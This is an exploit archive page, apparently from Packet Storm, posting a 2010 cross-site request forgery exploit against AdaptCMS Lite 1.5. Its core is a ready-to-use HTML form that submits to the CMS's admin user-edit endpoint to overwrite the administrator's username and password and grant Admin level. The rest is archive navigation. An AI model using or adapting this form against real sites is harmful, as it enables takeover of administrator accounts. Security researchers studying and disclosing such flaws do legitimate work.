exploit the possibilities

AdaptCMS Lite 1.5 Cross Site Request Forgery

AdaptCMS Lite 1.5 Cross Site Request Forgery
Posted Mar 28, 2010
Authored by ItSecTeam

AdaptCMS Lite version 1.5 change / add administrator cross site request forgery exploit.

tags | exploit, csrf
MD5 | fae27dd31615577721840f29e96f9fd6

AdaptCMS Lite 1.5 Cross Site Request Forgery

Change Mirror Download
===========================================================================
( #Topic : AdaptCMS_Lite_1.5 2009-07-07
( #Bug type : change admin (user,passwd) & add new admin user exploit
( #Download : http://sourceforge.net/projects/adaptcms/files/AdaptCMS%20Lite%20v1/1.5/AdaptCMS_Lite_1.5.zip/download
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability28.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!

---------------------------------------------------------------------
exploit:

<html>
<head>
<body>
<h2>coded by ahmadbady</h2>
<form action='admin.php?view=edit_users2&id=1' method='post'>
<table cellpadding='5' cellspacing='0' border='0' width='480' style='padding-left:5px' align='left'>
<tr><td>Username</td><td><input type='text' name='username1' size='16' value='anything'
style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
</td></tr><tr><td>New Password?</td><td><input type='text' name='password1' size='16'
style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
</td></tr><tr><td>E-Mail</td><td><input type='text' name='email1' size='16' value='anything'
style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
</td></tr><tr><td>Level</td><td><select name='level' style='font-family: tahoma;
font-size: 11px; border: 1px solid #444444;padding-left:1px'><option value='Admin'
selected>Admin - Level 1</option><option value='Member'>Member - Level 3</option>
<option value='Staff'>Staff - Level 2</option></select></td></tr><tr><td>
<input type='submit' value='Update User'
style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
</td>
</tr></table></form> </td></tr></table>
</body>
</html>
---------------------------------------------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    3 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close